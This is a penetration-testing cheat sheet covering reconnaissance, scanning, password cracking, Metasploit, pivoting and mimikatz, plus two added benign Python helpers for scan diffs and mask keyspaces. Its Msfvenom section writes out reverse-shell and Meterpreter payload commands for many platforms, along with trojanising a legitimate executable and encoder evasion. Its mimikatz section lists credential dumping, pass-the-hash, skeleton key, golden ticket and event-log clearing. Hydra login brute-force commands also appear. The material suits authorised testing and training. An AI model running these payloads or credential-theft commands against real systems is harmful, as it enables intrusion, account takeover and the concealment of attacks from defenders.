PENTEST NOTE
===
###### tags: `pentest`

![Title](https://i.imgur.com/fuUGlEy.png)

# 1. Reconnaissance

## 1.1 Shodanhq

FILTERS:
* `after/before` - date range
* `country` - country
* `city` - city
* `hostname` - host name
* `net` - IP address or subnet
* `os` - operating system
* `port` - port

`net:17.0.0.0/8` - Apple's network
- `has_screenshot:yes country:pl` (VNC)
- `has_screenshot:yes country:pl camera`

:::info
insecam.com
:::

## 1.2 theHarvester

Fetch the first 500 results for the chosen domain from all available data sources.

`# theharvester -d <domain> -l 500 -b all`

## 1.3 DNS

### 1.3.1 nslookup:

- Interactive mode:
```
# nslookup
Default Server: 192.168.1.1
Address: 192.168.1.1
> set type=a
> www.firma.pl
name: www.firma.pl
address: 10.10.10.100
```

### 1.3.2 host:

`# host -t [type] <domain> [server]`

### 1.3.3 dig:

```
# dig [@server] [-options] {name} [type]
# dig <target domain name> ns
```

### 1.3.4 Zone transfer:

1. Zone transfer with `host`
   `# host -l -v -t any <domain> <server>`
2. Zone transfer with `dig`
   `# dig @<server> <domain> axfr > dig_zone.txt`

## 1.4 Directory discovery

### 1.4.1 gobuster

- `gobuster -u http://10.10.10.79/cgi-bin/ -w /usr/share/wordlists/dirb/small.txt -s 302,307,200,204,301,403 -x sh,pl`

### 1.4.2 dirb

- `dirb http://10.10.10.79`

### 1.4.3 wfuzz

- `wfuzz -c -z file,/root/necromancer/thing.txt --hc 404 http://192.168.56.102/amagicbridgeappearsatthechasm/FUZZ`
- `wfuzz -u http://academy.htb/FUZZ.php -w /usr/share/wordlists/wfuzz/general/common.txt --hc 404,403 -t 100`

### 1.4.4 dirsearch

- `dirsearch -u http://10.10.10.79 -w /usr/share/wordlists/dirb/small.txt -e php,asp`

## 1.5 recon-ng

### Usage

* Help `help -option-`
* Use a module `use recon/<category>/<module>`
* Module options `show options`
* Set an option `set <OPTION> <VALUE>`
* List modules `show modules`
* Add an API key `keys add shodan_api <insert shodan api key here>`

# 2. Scanning

## 2.1 nmap

- By service name `# nmap -p smtp <target>`
- All ports `# nmap -p- <target>`
- Protocol-specific ports `# nmap -pT:25,U:53 <target>`

#### Nmap network sweeping

1. `nmap -p 139 192.168.1.*`
2. Save in greppable format `nmap -p 139 192.168.1.* -oG 139.txt`
3. `cat 139.txt`
4. To quickly extract just the addresses `cat 139.txt | grep open | cut -d " " -f2`

#### Nmap scripts

* The `-sC` and `--script` switches

:::info
`-sC` on its own runs the scripts from the `default` category
:::

- Help and information about a script `--script-help <script>`

Categories:
* discovery
* exploit
* fuzzer
* vuln `# nmap -sV --script vuln <target>`
* version
* safe
* dos
* auth

- All scripts from selected categories `# nmap -sV --script="version,discovery" <target>`
- All scripts except one category `# nmap -sV --script "not exploit" <target>`
- All HTTP scripts `# nmap -sV --script "(http-*)" <target>`
- All HTTP scripts except http-xssed and http-wordpress-users `# nmap -sV --script "(http-*) and not(http-xssed or http-wordpress-users)" <target>`
- Debugging, stack trace `# nmap -sV --script exploit -d3 --script-trace <target>`

:::info
Change the debug level with the `-d[1-9]` flag
:::

##### Comparing scan results

Scans are compared with `ndiff`. First save each scan to a file, e.g. as XML with `-oX <filename>`:

1) `# nmap -sn 192.168.50.0/24 -oX skan1`
2) `# nmap -sn 192.168.50.0/24 -oX skan2`
3) `ndiff skan1 skan2`

`skan1` is treated as the baseline. `[+]` marks added lines, `[-]` marks removed lines.
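Added example (not from the original notes): a small Python script that performs the same comparison as `ndiff` for the common case of hosts and open TCP ports, working directly on nmap's `-oX` output. Comparing a fresh scan against a saved baseline is the same check a defender runs to catch a service that was not there last week. The two XML documents, their addresses and services are constructed for this example; the function names are my own.

```python
"""Diff two nmap -oX scans: which hosts and open ports appeared or disappeared.

Added example, not from the original notes: it mirrors what `ndiff skan1 skan2`
reports for the common case. The two XML documents below are constructed for
this example (invented addresses and services).
"""
import xml.etree.ElementTree as ET

# Constructed baseline scan (the "skan1" role). Note 3306 is filtered, not open.
SCAN1 = """<nmaprun scanner="nmap" args="nmap -sV 192.168.50.0/24 -oX skan1">
<host><status state="up"/><address addr="192.168.50.10" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
<port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
<port protocol="tcp" portid="3306"><state state="filtered"/><service name="mysql"/></port>
</ports></host>
<host><status state="up"/><address addr="192.168.50.11" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port>
</ports></host>
</nmaprun>"""

# Constructed later scan: .10 now exposes MySQL, .11 is down, .12 is a new host running telnet
SCAN2 = """<nmaprun scanner="nmap" args="nmap -sV 192.168.50.0/24 -oX skan2">
<host><status state="up"/><address addr="192.168.50.10" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
<port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
<port protocol="tcp" portid="3306"><state state="open"/><service name="mysql"/></port>
</ports></host>
<host><status state="down"/><address addr="192.168.50.11" addrtype="ipv4"/></host>
<host><status state="up"/><address addr="192.168.50.12" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="23"><state state="open"/><service name="telnet"/></port>
</ports></host>
</nmaprun>"""


def parse_open_ports(xml_text):
    """Return {ip: {(proto, port, service), ...}} for every host nmap saw as up."""
    root = ET.fromstring(xml_text)
    hosts = {}
    for host in root.findall("host"):
        status = host.find("status")
        if status is not None and status.get("state") != "up":
            continue                                  # down hosts have no listeners
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        open_ports = set()
        for port in host.findall("./ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue                              # closed/filtered ports are not listeners
            service = port.find("service")
            name = service.get("name", "") if service is not None else ""
            open_ports.add((port.get("protocol"), int(port.get("portid")), name))
        hosts[addr.get("addr")] = open_ports
    return hosts


def diff_scans(baseline_xml, new_xml):
    """Describe what changed between the baseline scan and the new one."""
    old, new = parse_open_ports(baseline_xml), parse_open_ports(new_xml)
    changes = {
        "new_hosts": sorted(set(new) - set(old)),
        "gone_hosts": sorted(set(old) - set(new)),
        "new_ports": {},
        "closed_ports": {},
    }
    for ip in sorted(set(old) & set(new)):
        if new[ip] - old[ip]:
            changes["new_ports"][ip] = sorted(new[ip] - old[ip])
        if old[ip] - new[ip]:
            changes["closed_ports"][ip] = sorted(old[ip] - new[ip])
    return changes


def format_report(changes):
    """Render the changes ndiff-style: '+' for what appeared, '-' for what vanished."""
    lines = [f"+ host {ip}" for ip in changes["new_hosts"]]
    lines += [f"- host {ip}" for ip in changes["gone_hosts"]]
    for ip, ports in changes["new_ports"].items():
        lines += [f"+ {ip} {port}/{proto} open {name}" for proto, port, name in ports]
    for ip, ports in changes["closed_ports"].items():
        lines += [f"- {ip} {port}/{proto} open {name}" for proto, port, name in ports]
    return lines


if __name__ == "__main__":
    print("\n".join(format_report(diff_scans(SCAN1, SCAN2))))
```

Run it with two real `-oX` files by reading them into `SCAN1`/`SCAN2`; the only states that matter for the diff are `up` hosts and `open` ports, which is why a port going from `filtered` to `open` shows up as a new listener.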
#### vulscan

`nmap -sV --script=vulscan/vulscan.nse <target>`

Single Database Mode

`nmap -sV --script=vulscan/vulscan.nse --script-args vulscandb=exploitdb.csv <target>`

## 2.2 hping3

- <to do>

## 2.3 unicornscan

#### Options

```
SYN : -mT
ACK scan : -mTsA
Fin scan : -mTsF
Null scan : -mTs
Xmas scan : -mTsFPU
Connect Scan : -msf -Iv
scan with all options : -mTFSRPAUEC
Syn + osdetect : -eosdetect -Iv (-mT)
scan ports 1 through 5 : (-mT) host:1-5
-----------------------------------------------------
-mU : is mode UDP
-mT : is mode TCP
-I : Display Immediately
192.168.100.1 : target IP
:53,80,443 : ports
-r200 : 200 Packets per second
```

##### 1. Simple TCP SYN scan

```
root@kali:~# unicornscan 172.16.215.132
TCP open http[ 80] from 172.16.215.132 ttl 128
TCP open epmap[ 135] from 172.16.215.132 ttl 128
TCP open netbios-ssn[ 139] from 172.16.215.132 ttl 128
TCP open microsoft-ds[ 445] from 172.16.215.132 ttl 128
```

##### 2. UDP scan

```
root@kali:~# unicornscan -mU -r200 -I 192.168.100.1:53
UDP open 192.168.100.1:53 ttl 128
UDP open domain[ 53] from 192.168.100.1 ttl 128
```

##### 3. TCP port scan

`root@kali:~# unicornscan -r500 -mT 192.168.100.1/24:80,443,445,339`

##### 4. Practical example

Scanning for MySQL together with the http and https ports

```
root@kali:~# unicornscan -r200 -Iv -eosdetect -mT 172.16.215.1:3306,80,443
TCP open 172.16.215.1:80 ttl 64
ST 1 IP TTL 64 TOS 0x00 [DF] TCP WS 65535 urg_ptr 0000
TCP open 172.16.215.1:3306 ttl 64
sender statistics 197.8 pps with 3 packets sent total
listener statistics 6 packets received 0 packets droped and 0 interface drops
TCP open http[ 80] from 172.16.215.1 ttl 64 OS `'
TCP open mysql[ 3306] from 172.16.215.1 ttl 64 OS `'
```

## 2.4 Scapy

`>>> send(IP(dst="10.1.99.2")/ICMP()/"HelloWorld")`

`send(IP(src="10.1.99.100", dst="10.1.99.2")/ICMP()/"HelloWorld")`

* `sr()` - the sr() function sends packets and receives answers. It returns a pair: the packets with their answers, and the unanswered packets.
* `sr1()` - a variant that returns only the first packet that answered the sent packet (or packet set)

```
>>> h=sr1(IP(dst="10.1.99.2")/ICMP())
Begin emission:
.Finished to send 1 packets.
*
Received 2 packets, got 1 answers, remaining 0 packets
```

* `>>> h.show()` - to display the packet

```
>>> p=sr(IP(dst="10.1.99.2")/TCP(sport=666,dport=[22,80,21,443],flags="S"))
Begin emission:
***Finished to send 4 packets.
*
Received 4 packets, got 4 answers, remaining 0 packets
```

More than one port goes inside `[]`

```
>>> p
>>> (<Results: TCP:4 UDP:0 ICMP:0 Other:0>, <Unanswered: TCP:0 UDP:0 ICMP:0 Other:0>)
```

To see the results of `sr()` or `sr1()`

```
>>> ans,unans=_
>>> ans.summary()
IP / TCP 10.1.99.25:666 > 10.1.99.2:ssh S ==> IP / TCP 10.1.99.2:ssh > 10.1.99.25:666 SA / Padding
IP / TCP 10.1.99.25:666 > 10.1.99.2:http S ==> IP / TCP 10.1.99.2:http > 10.1.99.25:666 SA / Padding
IP / TCP 10.1.99.25:666 > 10.1.99.2:ftp S ==> IP / TCP 10.1.99.2:ftp > 10.1.99.25:666 RA / Padding
IP / TCP 10.1.99.25:666 > 10.1.99.2:https S ==> IP / TCP 10.1.99.2:https > 10.1.99.25:666 RA / Padding
```

#### ARP

```
>>> ans,unans=sr(ARP(hwsrc="08:00:27:66:4d:84",psrc="192.168.1.102",pdst="192.168.1.103"))
>>> ans.summary()
ARP who has 192.168.1.103 says 192.168.1.102 ==> ARP is at 08:00:27:93:19:12 says 192.168.1.103 / Padding
```

## 2.5 netcat

`# nc -n -v -z -w 1 <ip> 1-1024`

`-n` - IP addresses only, no DNS
`-v` - verbose
`-z` - zero-I/O mode [used for scanning]
`-w` - timeout in seconds
`1-1024` - port range

# 3. Enumeration

:::danger
Links:
- [Local Linux Enum](https://www.rebootuser.com/?p=1623)
- [Windows Enum](https://www.sploitspren.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
- [AutoRecon](https://github.com/Tib3rius/AutoRecon)
- [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS)
:::

## 3.1 SNMP

Make SNMP output more readable:

```
apt-get install snmp-mibs-downloader
download-mibs
echo "" > /etc/snmp/snmp.conf
```

`snmpcheck -t 192.168.1.X -c public`

`snmpwalk -c public -v1 192.168.1.X 1 | grep hrSWRunName | cut -d " " -f 4`

`snmpenum -t 192.168.1.X`

`onesixtyone -c names -i hosts`

## 3.2 LinEnum

[LinEnum - github](https://github.com/rebootuser/LinEnum)

## 3.3 LPC

[linuxprivchecker - github](https://github.com/oschoudhury/linuxprivchecker)

## 3.4 linux-smart-enumeration

[lse.sh](https://github.com/diego-treitos/linux-smart-enumeration)

One-liners:

`wget "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -O lse.sh;chmod 700 lse.sh`

`curl "https://github.com/diego-treitos/linux-smart-enumeration/raw/master/lse.sh" -Lo lse.sh;chmod 700 lse.sh`

## 3.5 ICMP Timestamp Request

```
# ping -T tsonly <IP>
```

Sample output:

```
PING <IP> (<IP>) 56(124) bytes of data.
64 bytes from <IP>: icmp_seq=1 ttl=64 time=0.040 ms
TS: 44567155 absolute
0
0
0
```

What this means:

# 4. Attack

## 4.1 Passwords

### 4.1.1 John

#### 1. Generating a hash

`echo -n password | md5sum | tr -d " -"`

or with a bash loop over a file:

```
for i in $(cat wordlist); do echo -n "$i" | md5sum | tr -d " -" >> hashes; done
```

* `john --show --format=raw-md5 <hash.file>`

#### 2. Generating a salted hash

###### 1. openssl

`openssl passwd -1 -salt <salt> <password>`

###### 2. mkpasswd

`mkpasswd -m md5 -S <salt> <password>`

### 4.1.2 Hashcat

`hashcat -a 0 -m 0 hashfile.txt wordlist.lst --force`

```
-h | --help
-a | --attack-mode
-m | --hash-type
-o | --output-file
```

#### Mask attack

* Built-in charsets

```
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?s = !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff
```

* Custom charsets

```
-1, --custom-charset1=CS   User-defined charsets
-2, --custom-charset2=CS   Example:
-3, --custom-charset3=CS   --custom-charset1=?dabcdef : sets charset ?1 to 0123456789abcdef
-4, --custom-charset4=CS   -2 mycharset.hcchr : sets charset ?2 to chars contained in file
```

The definition `-1 ?u -2 ?u?l?d -3 ?d` means:

```
Charset  Contains the characters
-1       ABCDEFGHIJKLMNOPQRSTUVWXYZ
-2       abcdefghijklmnopqrstuvwxyz ABCDEFGHIJKLMNOPQRSTUVWXYZ 0123456789
-3       0123456789
```

* For the password `B4nan1` the mask can look like this: `?1?1?2?2?2?3`
* The full command can then be: `# hashcat -a 3 -m 0 -1 ?u -2 ?u?l?d -3 ?d hash ?1?1?2?2?2?3`

##### --increment argument

With the mask `?1?1?2?2?2?3` the program only tries passwords of length 6. To try every length from 1 to 6 we use the `--increment` (`-i`) argument. In this case the masks tried are:

```
?1
?1?1
?1?1?2
?1?1?2?2
?1?1?2?2?2
?1?1?2?2?2?3
```

To set the minimum or maximum length:

```
--increment-min=NUM | --increment-min=4
--increment-max=NUM | --increment-max=8
```

### 4.1.3 Hydra

How to use it:

1. Choose the target. There are 3 options:
   a. Single target - give an IP
   b. Network range - CIDR, e.g. 192.168.0.0/24
   c. A list
2. Choose the protocol
3. Check whether the protocol module has extra parameters, e.g. `hydra -U <PROTOCOL>` (`hydra -U smtp`)
4. Target port, **OPTIONAL**. If it is not set, the protocol's default port is used.
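Added example (not part of the original notes): a keyspace calculator for the hashcat mask syntax above, with custom charsets `-1`..`-4` and the `--increment` range, and for the Hydra `-x min:max:charset` brute-force spec described in the next block. It turns a mask into the number of candidates it covers, which is what decides whether a password policy survives an offline attack at a given guess rate. The helper names (`parse_mask`, `keyspace`, `hydra_x_keyspace`, `time_to_exhaust`) are my own, and the guess rate passed in is an assumed figure, not a benchmark.

```python
"""Keyspace calculator for hashcat masks and Hydra -x brute-force specs.

Added example, not from the original notes. Helper names (parse_mask, keyspace,
hydra_x_keyspace, time_to_exhaust) are my own; the guess rate passed to
time_to_exhaust is whatever the caller assumes for their hardware.
"""
import string

# hashcat's built-in charsets (?s includes the space, which the table above omits)
BUILTIN = {
    "l": string.ascii_lowercase,
    "u": string.ascii_uppercase,
    "d": string.digits,
    "s": " !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~",
}
BUILTIN["a"] = BUILTIN["l"] + BUILTIN["u"] + BUILTIN["d"] + BUILTIN["s"]
BUILTIN["b"] = "".join(chr(i) for i in range(256))


def expand_charset(spec, custom):
    """Expand a charset spec such as '?u?l?d' or '?dabcdef' into a de-duplicated string.

    custom maps '1'..'4' to already expanded custom charsets, so -2 may refer to ?1.
    """
    chars = []
    i = 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            if key == "?":
                chars.append("?")            # '??' is a literal question mark
            elif key in BUILTIN:
                chars.extend(BUILTIN[key])
            elif key in custom:
                chars.extend(custom[key])
            else:
                raise ValueError(f"unknown charset ?{key}")
            i += 2
        else:
            chars.append(spec[i])            # plain character, e.g. 'abcdef' in ?dabcdef
            i += 1
    return "".join(dict.fromkeys(chars))     # keep order, drop duplicates


def parse_mask(mask, custom_specs=None):
    """Return one charset string per mask position.

    custom_specs is {'1': '?u', '2': '?u?l?d', '3': '?d'} for `-1 ?u -2 ?u?l?d -3 ?d`.
    A literal character in the mask (the 'P' in 'P?l?l') is a one-element charset.
    """
    custom = {}
    for key in sorted(custom_specs or {}):   # -1 is defined before -2, and so on
        custom[key] = expand_charset(custom_specs[key], custom)
    positions = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            positions.append(expand_charset(mask[i:i + 2], custom))
            i += 2
        else:
            positions.append(mask[i])
            i += 1
    return positions


def keyspace(mask, custom_specs=None, increment=False, inc_min=1, inc_max=None):
    """Number of candidates `hashcat -a 3` tries for the mask.

    With increment=True the mask is truncated to every length from inc_min up to
    inc_max (default: the full mask), like --increment / --increment-min / --increment-max.
    """
    positions = parse_mask(mask, custom_specs)
    longest = len(positions)
    if increment:
        lengths = range(inc_min, min(inc_max or longest, longest) + 1)
    else:
        lengths = [longest]
    total = 0
    for n in lengths:
        size = 1
        for charset in positions[:n]:
            size *= len(charset)
        total += size
    return total


def hydra_x_keyspace(spec):
    """Candidates for Hydra's -x MIN:MAX:CHARSET, where a = lowercase, A = uppercase,
    1 = digits and any other character is taken literally (e.g. '4:6:a1', '6:8:aA1!')."""
    min_len, max_len, charset_spec = spec.split(":", 2)
    alphabet = {"a": string.ascii_lowercase, "A": string.ascii_uppercase, "1": string.digits}
    chars = "".join(dict.fromkeys("".join(alphabet.get(c, c) for c in charset_spec)))
    return sum(len(chars) ** n for n in range(int(min_len), int(max_len) + 1))


def time_to_exhaust(candidates, guesses_per_second):
    """Seconds needed to try every candidate at the given (assumed) guess rate."""
    return candidates / guesses_per_second


if __name__ == "__main__":
    custom = {"1": "?u", "2": "?u?l?d", "3": "?d"}
    full = keyspace("?1?1?2?2?2?3", custom)
    incr = keyspace("?1?1?2?2?2?3", custom, increment=True)
    print(f"mask ?1?1?2?2?2?3: {full:,} candidates, {incr:,} with --increment")
    print(f"hydra -x 4:6:a1: {hydra_x_keyspace('4:6:a1'):,} candidates")
    # assumed rate for raw MD5 (-m 0) on one GPU; replace with your own benchmark
    print(f"at 10 GH/s the full mask is exhausted in {time_to_exhaust(full, 10e9):.2f} s")
```

The `?1?1?2?2?2?3` mask from the `B4nan1` example covers 26 * 26 * 62 * 62 * 62 * 10 candidates; the increment run adds the shorter prefixes on top of that. A slow hash (bcrypt, scrypt, Argon2) lowers the guess rate by orders of magnitude, which is the lever a defender controls.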
```
Brute force
> -x option
-x min_length:max_length:charset
> charset:
a - lowercase letters
A - uppercase letters
1 - digits
everything else is taken literally
```

#### Hydra Brute-Force Web Auth

:::info
Using metasploitable2 as the example
:::

Simple

```
hydra -l <login> -P <wordlist> <IP> http-post-form "<path>:username=^USER^&password=^PASS^:Error"
```

##### - hydra-gtk

##### - hydra

```
hydra -V -l admin -P <wordlist> -e n -t 1 -f -m "/dvwa/login.php:username=^USER^&password=^PASS^&Login=Login:Login Failed" <IP> http-post-form
```

`-V` - verbose mode
`-l` - login
`-P` - password file (in this example: `/usr/share/wordlists/metasploit/unix_passwords.txt`)
`-e` - extra checks (`n` - null password, `s` - login as password, `r` - reversed login)
`-t` - number of threads
`-f` - exit after the first login/password pair is found
`-m` - module options

#### Hydra postgres Brute-Force

:::info
Using metasploitable2 as the example
:::

```
hydra -V -l postgres -P /usr/share/wordlists/metasploit/unix_passwords.txt -e ns -t 16 -f <IP> postgres
```

### 4.1.4 Rainbow tables

1) **Define the reduction function**

In this example the reduction function (RF) builds a new password by taking the first 4 digits of the hash. The function is limited to cracking passwords that:
- consist of 4 characters
- contain only digits
- it fails when the hash does not contain at least 4 digits

2) **Compute the rainbow table values**

Take a sample password: `1729`. Its hash is computed:

```
echo -n 1729 | md5sum
25e2a30f44898b9f3e978b1786dcd85c
```

Apply the RF to the resulting hash. The result is: `2523`

The next steps proceed the same way: `MD5 -> RF -> PASS -> MD5 -> RF ...`

:::info
For the example we stop at the MD5 of the password 0963
```
echo -n 0963 | md5sum
d1cbdbc9cacee6c8b133c7a92a83bcca
```
:::

3) **Compression**

[first entry];[last hash];[number of iterations]

`1729;d1cbdbc9cacee6c8b133c7a92a83bcca;5`

This entry goes into the table.

4) **Looking up in the rainbow table**

* We have a hash to find, e.g.: `99503bdd3c5a4c4671ada72d6fd81433`
* It is not in our 1-element table. Apply the reduction function; the result is: `9950`
* That is not there either, so we keep applying RF and MD5 until we obtain the hash: `d1cbdbc9cacee6c8b133c7a92a83bcca`
* Hit. This hash is in our table, so we have found the entry that holds information about the hash we are looking for.
* To learn which password produced the hash, we start hashing from the first password of the chain until we reach it:

`echo -n 1729 | md5sum`
`25e2a30f44898b9f3e978b1786dcd85c`
...
`echo -n 6259 | md5sum`
`99503bdd3c5a4c4671ada72d6fd81433`

### 4.1.5 Generating wordlists

#### 4.1.5.1 Crunch

`crunch <min chars> <max chars> <charset> -t <mask, e.g. S@cr%@ for Secr3t> -o <output>`

Note the wordlist sizes:

1) `crunch 3 5 abcd`
2) `crunch 3 5 abcdefghijklmnoprstuwxyz`
3) `crunch 8 8 as@$0 -t P@@@w@rd`

#### 4.1.5.2 CUPP

`# git clone https://github.com/Mebus/cupp.git`

`# python cupp.py -i`

## 4.2 Metasploit

- Databases

```
# service postgresql start
# msfdb init
msf > db_status
```

- Workspaces

`workspace -a lab1`
`workspace -d lab1`

- Switching `workspace lab1`
- Renaming `workspace -r lab1 lab2`
- Importing data `db_import /root/nmap-scan.xml`
- Exporting data `db_export -f xml /root/test.xml`

- Syntax
- Show auxiliary modules `show auxiliary`
- Use a module

```
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/http/webdav_scanner
use auxiliary/scanner/smb/smb_version
use auxiliary/scanner/ftp/ftp_login
use exploit/windows/pop3/seattlelab_pass
```

- Module information `info`
- Module options `show options`
- Setting options

```
set RHOSTS 192.168.1.1-254
set THREADS 10
```

- Running a module `run`
- Running an exploit `exploit`
- Searching for a module `search type:auxiliary login`
- nmap scan `db_nmap -sV 192.168.1.25`
- View hosts `hosts`
- Database queries and pulling out data
  - Selected columns only `hosts -c address,os_name,state`
  - Searching `hosts -S <pattern>`
  - Adding hosts to a scan `hosts -c address,os_name -S Windows -R` or `services -p 443 --rhosts`
  - Adding all hosts `hosts -R`
- `services -h`

```
> services -c name,info,state <ip>
> services -c name,info -S http
```

- Searching by port: `> services -c name,info -p 445`

### Exploits from exploitdb

```
# searchsploit <name>
# /usr/share/exploitdb/
```

### Msfvenom

1. List available payloads `# msfvenom -l payloads`
2. Show a payload's options `# msfvenom -p <payload> --payload-options`
3. Set options and the output format `# msfvenom -p <payload> LHOST=… LPORT=… -f exe > exp1.exe`

With an encoder `# msfvenom -l encoders`

1. Building the trojan with an encoder and a number of iterations `# msfvenom -p <payload> LHOST=… LPORT=… -e x86/shikata_ga_nai -i 200 -f exe > exp2.exe`

:::info
shikata ga nai - "it cannot be helped"
:::

Using `-x` (template)

1. Download e.g. calc.exe `# msfvenom -p <payload> LHOST=… LPORT=… -f exe -x ./calc.exe > exp3.exe`
2. Add `-k` to keep the original program running `# msfvenom -p <payload> LHOST=… LPORT=… -f exe -x ./calc.exe -k > exp3.exe`

:::info
Connecting over SMB: `smbclient //<ip>/c$ -U administrator`
:::

Creating Meterpreter Shells with MSFVenom

*Linux*
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f elf > shell.elf`

*Windows*
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe`

*Mac*
`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f macho > shell.macho`

**Web Payloads**

*PHP*
`msfvenom -p php/reverse_php LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`
or
`msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php`

Then we need to add `<?php` as the first line of the file so that it executes as a PHP web page:
`cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php`

*ASP*
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp`

*JSP*
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp`

*WAR*
`msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war`

**Scripting Payloads**

*Python*
`msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py`

*Bash*
`msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh`

*Perl*
`msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl`

**Shellcode**

For all shellcode see `msfvenom --help-formats` for information as to valid parameters.
Msfvenom will output code that can be cut and pasted into your exploits in the chosen language.

*Linux Based Shellcode*
`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`

*Windows Based Shellcode*
`msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`

*Mac Based Shellcode*
`msfvenom -p osx/x86/shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f <language>`

**Handlers**

Metasploit handlers are a quick way to set Metasploit up to receive your incoming shells. A handler should have the following format:

```
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
set ExitOnSession false
exploit -j -z
```

Once the required values are filled in, the following command will start your handler from a resource file: `msfconsole -L -r <handler.rc>`

### exploit_suggester

`post/multi/recon/local_exploit_suggester`

## 4.3 Pivoting

### 4.3.1 SSH Pivoting

```
ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip
```

Add `socks4 127.0.0.1 1010` to /etc/proxychains.conf

SSH pivoting from one network to another:

```
ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1
```

Add `socks4 127.0.0.1 1010` to /etc/proxychains.conf

```
proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2
```

Add `socks4 127.0.0.1 1011` to /etc/proxychains.conf

## 4.4 mimikatz

### 4.4.1 Common commands

```
- CRYPTO::Certificates - list/export certificates
- KERBEROS::Golden - create golden / silver / trust tickets
- KERBEROS::List - List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user's tickets. Similar to functionality of "klist".
- KERBEROS::PTT - pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).
- LSADUMP::DCSync - ask a DC to synchronize an object (get password data for account). No need to run code on DC.
- LSADUMP::LSA - Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: "/name:krbtgt"
- LSADUMP::SAM - get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.
- LSADUMP::Trust - Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).
- MISC::AddSid - Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.
- MISC::MemSSP - Inject a malicious Windows SSP to log locally authenticated credentials.
- MISC::Skeleton - Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a "master password" (aka Skeleton Keys) as well as their usual password.
- PRIVILEGE::Debug - get debug rights (this or Local System rights is required for many Mimikatz commands).
- SEKURLSA::Ekeys - list Kerberos encryption keys
- SEKURLSA::Kerberos - List Kerberos credentials for all authenticated users (including services and computer account)
- SEKURLSA::Krbtgt - get Domain Kerberos service account (KRBTGT) password data
- SEKURLSA::LogonPasswords - lists all available provider credentials. This usually shows recently logged on user and computer credentials.
- SEKURLSA::Pth - Pass-the-Hash and Over-Pass-the-Hash
- SEKURLSA::Tickets - Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer's AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of other sessions (users).
- TOKEN::List - list all tokens of the system
- TOKEN::Elevate - impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box
- TOKEN::Elevate /domainadmin - impersonate a token with Domain Admin credentials.
- EVENT::Clear - clear the event logs
```

### 4.4.2 Mimikatz commands

Mimikatz can also be run with the commands passed on the command line, followed by `exit`:

- `PS C:\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit`

Mimikatz from Metasploit:

- `meterpreter > mimikatz_command -f sekurlsa::logonPasswords`
- `meterpreter > mimikatz_command -f sekurlsa::searchPasswords`

##### PTH

